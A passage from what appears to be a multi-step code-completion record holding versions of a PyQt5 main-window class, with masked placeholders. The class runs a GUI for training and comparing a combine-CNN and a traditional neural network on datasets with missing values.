self.show()\n\n def initConnect(self):\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.\n setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.\n setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n 
self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n\n def chooseData(self):\n if self.sender() is self.dataFileChooseButton:\n self.fname['New'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n elif self.sender() is self.dataFileChooseButtonT:\n self.fname['Tra'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n return\n\n def loadData(self):\n if self.sender() is self.dataFileChooseButton:\n try:\n self.dataFor['New'] = myLoadData.loadData(self.fname['New'],\n self.dataLossRate['New'], self.dataSetLossValue['New'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['New'].split('/')[-1].split('.')[0]\n self.presentDataName.setText(dataname)\n self.presentDataName.resize(self.presentDataName.sizeHint())\n elif self.sender() is self.dataFileChooseButtonT:\n try:\n self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'],\n self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['Tra'].split('/')[-1].split('.')[0]\n self.presentDataNameT.setText(dataname)\n self.presentDataNameT.resize(self.presentDataNameT.sizeHint())\n return\n\n def setLossParameter(self):\n if self.sender() is self.dataLossSimulateSettingButton:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'combine-CNN设置缺失参数', self, 'New')\n elif self.sender() is self.dataLossSimulateSettingButtonT:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'traditional NN设置缺失参数', self, 'Tra')\n return\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',\n self, 'New')\n elif self.sender() is self.dataShowButtonT:\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'\n , self, 'Tra')\n return\n\n def preProcess(self):\n if self.dataFor['Tra'] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n self.dataFor['Tra'].MeanPreProcess()\n reply = QMessageBox.information(self, 'Message',\n 'PreProcess succeed!', QMessageBox.Yes, QMessageBox.Yes)\n return\n <mask token>\n\n def training(self):\n if self.sender() is self.trainingButton:\n if self.trainingW is not None:\n self.trainingW.hide()\n 
self.trainingW.show()\n return\n senderName = 'New'\n elif self.sender() is self.trainingButtonT:\n if self.trainingWT is not None:\n self.trainingWT.hide()\n self.trainingWT.show()\n senderName = 'Tra'\n if self.dataFor[senderName] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法训练',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n elif senderName == 'New':\n if self.dataFor[senderName].DataTrainX.shape[1\n ] < self.combineNumConv:\n reply = QMessageBox.information(self, '参数错误',\n '卷积层组合(卷积核)大小大于数据集特征数量', QMessageBox.Yes, QMessageBox.Yes)\n return\n if combineNumCalculate.combineNumCal(self.dataFor[senderName].\n DataTrainX.shape[1], self.combineNumConv\n ) < self.combineNumPooling:\n reply = QMessageBox.information(self, '参数错误',\n '池化层组合(池化核)大小大于卷积层输出特征向量维度', QMessageBox.Yes,\n QMessageBox.Yes)\n return\n if self.trainingWT is not None:\n reply = QMessageBox.information(self, '提示',\n 'traditional NN训练正在进行,请等待其结束', QMessageBox.Yes,\n QMessageBox.Yes)\n return\n self.trainingW = TrainingWidget.trainningWidget('combine-CNN训练',\n self, senderName)\n self.traingWidgetOnFlag[senderName] = False\n elif senderName == 'Tra':\n if self.trainingW is not None:\n reply = QMessageBox.information(self, '提示',\n 'combine-CNN训练正在进行,请等待其结束', QMessageBox.Yes,\n QMessageBox.Yes)\n return\n self.trainingWT = TrainingWidget.trainningWidget('traditional NN训练'\n , self, senderName)\n self.traingWidgetOnFlag[senderName] = False\n return\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n <mask token>\n\n def showResult(self):\n if self.sender() is self.showResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'combine-CNN预测结果展示', self, 'New')\n elif self.sender() is self.showResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'traditional NN预测结果展示', self, 'Tra')\n return\n\n def showJudge(self):\n if self.sender() is self.judgeResultButton:\n if 
self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'New'))\n elif self.sender() is self.judgeResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'Tra'))\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass MyMainWindow(QMainWindow):\n\n def __init__(self):\n super().__init__()\n self.windowLength = 1250\n self.windowHigh = 900\n self.fname = dict()\n self.fname['New'] = None\n self.fname['Tra'] = None\n self.dataLossRate = dict()\n self.dataSetLossValue = dict()\n self.dataFor = dict()\n self.dataFor['New'] = None\n self.dataLossRate['New'] = 0.0\n self.dataSetLossValue['New'] = 0.0\n self.dataFor['Tra'] = None\n self.dataLossRate['Tra'] = 0.0\n self.dataSetLossValue['Tra'] = 0.0\n self.traingWidgetOnFlag = dict()\n self.traingWidgetOnFlag['New'] = False\n self.traingWidgetOnFlag['Tra'] = False\n self.combineNumConv = 2\n self.convCoreNum = 5\n self.combineNumPooling = 4\n self.fullConnectOutInRate = 0.5\n self.mcbcnn = None\n self.trann = None\n self.trainingW = None\n self.trainingWT = None\n self.initUI()\n self.initConnect()\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n 
hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n 
vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n\n def initConnect(self):\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.\n setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.\n setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n\n def chooseData(self):\n if self.sender() is self.dataFileChooseButton:\n self.fname['New'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n elif self.sender() is self.dataFileChooseButtonT:\n self.fname['Tra'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n return\n\n def loadData(self):\n if self.sender() is self.dataFileChooseButton:\n try:\n self.dataFor['New'] = myLoadData.loadData(self.fname['New'],\n self.dataLossRate['New'], self.dataSetLossValue['New'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['New'].split('/')[-1].split('.')[0]\n self.presentDataName.setText(dataname)\n self.presentDataName.resize(self.presentDataName.sizeHint())\n elif self.sender() is self.dataFileChooseButtonT:\n try:\n self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'],\n self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['Tra'].split('/')[-1].split('.')[0]\n self.presentDataNameT.setText(dataname)\n self.presentDataNameT.resize(self.presentDataNameT.sizeHint())\n return\n\n def setLossParameter(self):\n if self.sender() is self.dataLossSimulateSettingButton:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'combine-CNN设置缺失参数', self, 'New')\n elif self.sender() is self.dataLossSimulateSettingButtonT:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'traditional NN设置缺失参数', self, 'Tra')\n return\n\n def 
showData(self):\n if self.sender() is self.dataShowButton:\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',\n self, 'New')\n elif self.sender() is self.dataShowButtonT:\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'\n , self, 'Tra')\n return\n\n def preProcess(self):\n if self.dataFor['Tra'] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n self.dataFor['Tra'].MeanPreProcess()\n reply = QMessageBox.information(self, 'Message',\n 'PreProcess succeed!', QMessageBox.Yes, QMessageBox.Yes)\n return\n\n def setModelParameters(self):\n if self.sender() is self.setModelParametersButton:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('combine-CNN模型参数设置', self, 'New'))\n elif self.sender() is self.setModelParametersButtonT:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('traditional NN模型参数设置', self, 'Tra'))\n\n def training(self):\n if self.sender() is self.trainingButton:\n if self.trainingW is not None:\n self.trainingW.hide()\n self.trainingW.show()\n return\n senderName = 'New'\n elif self.sender() is self.trainingButtonT:\n if self.trainingWT is not None:\n self.trainingWT.hide()\n self.trainingWT.show()\n senderName = 'Tra'\n if self.dataFor[senderName] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法训练',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n elif senderName == 'New':\n if self.dataFor[senderName].DataTrainX.shape[1\n ] < self.combineNumConv:\n reply = QMessageBox.information(self, '参数错误',\n '卷积层组合(卷积核)大小大于数据集特征数量', QMessageBox.Yes, QMessageBox.Yes)\n return\n if combineNumCalculate.combineNumCal(self.dataFor[senderName].\n DataTrainX.shape[1], self.combineNumConv\n ) < self.combineNumPooling:\n reply = QMessageBox.information(self, '参数错误',\n '池化层组合(池化核)大小大于卷积层输出特征向量维度', QMessageBox.Yes,\n QMessageBox.Yes)\n return\n if self.trainingWT is not None:\n reply = QMessageBox.information(self, '提示',\n 'traditional NN训练正在进行,请等待其结束', QMessageBox.Yes,\n QMessageBox.Yes)\n return\n self.trainingW = TrainingWidget.trainningWidget('combine-CNN训练',\n self, senderName)\n self.traingWidgetOnFlag[senderName] = False\n elif senderName == 'Tra':\n if self.trainingW is not None:\n reply = QMessageBox.information(self, '提示',\n 'combine-CNN训练正在进行,请等待其结束', QMessageBox.Yes,\n QMessageBox.Yes)\n return\n self.trainingWT = TrainingWidget.trainningWidget('traditional NN训练'\n , self, senderName)\n self.traingWidgetOnFlag[senderName] = False\n return\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 
'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.\n combineNumConv, self.convCoreNum, self.\n combineNumPooling)\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n succeed = self.trann.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n def showResult(self):\n if self.sender() is self.showResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'combine-CNN预测结果展示', self, 'New')\n elif self.sender() is self.showResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'traditional NN预测结果展示', self, 'Tra')\n return\n\n def showJudge(self):\n if self.sender() is self.judgeResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'New'))\n elif self.sender() is self.judgeResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'Tra'))\n\n\n<mask token>\n",
"step-5": "import sys\nfrom PyQt5.QtWidgets import (QMainWindow, QWidget, QHBoxLayout, QVBoxLayout, QFrame,\n QSplitter, QStyleFactory, QApplication, QPushButton, QTextEdit, QLabel, QFileDialog, QMessageBox)\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QFont, QColor\nimport myLoadData\nfrom UIPack import setLossParameterDialog, showDataWidget, setModelParametersDialog, TrainingWidget, showResultWidget,\\\n showJudgeWidgets, chooseJudgeDataSetWidget\nfrom MyCombCNNPack import combineNumCalculate, myCombineCNN, traditionalNN, Judgement\n\nclass MyMainWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n\n self.windowLength = 1250\n self.windowHigh = 900\n\n self.fname = dict()\n self.fname['New'] = None\n self.fname['Tra'] = None\n\n self.dataLossRate = dict()\n self.dataSetLossValue = dict()\n self.dataFor = dict()\n\n self.dataFor['New'] = None\n self.dataLossRate['New'] = 0.\n self.dataSetLossValue['New'] = 0.\n\n self.dataFor['Tra'] = None\n self.dataLossRate['Tra'] = 0.\n self.dataSetLossValue['Tra'] = 0.\n\n self.traingWidgetOnFlag = dict()\n self.traingWidgetOnFlag['New'] = False\n self.traingWidgetOnFlag['Tra'] = False\n\n self.combineNumConv = 2\n self.convCoreNum = 5\n self.combineNumPooling = 4\n\n self.fullConnectOutInRate = 0.5\n\n self.mcbcnn = None\n self.trann = None\n\n self.trainingW = None\n self.trainingWT = None\n\n self.initUI()\n self.initConnect()\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n\n ####### data module #######\n dataModule = QVBoxLayout()\n\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n\n\n ###### training module ########\n trainingModule = QVBoxLayout()\n\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n # self.setTrainingParametersButton = QPushButton('Trainning Parameters')\n # self.setTrainingParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n 
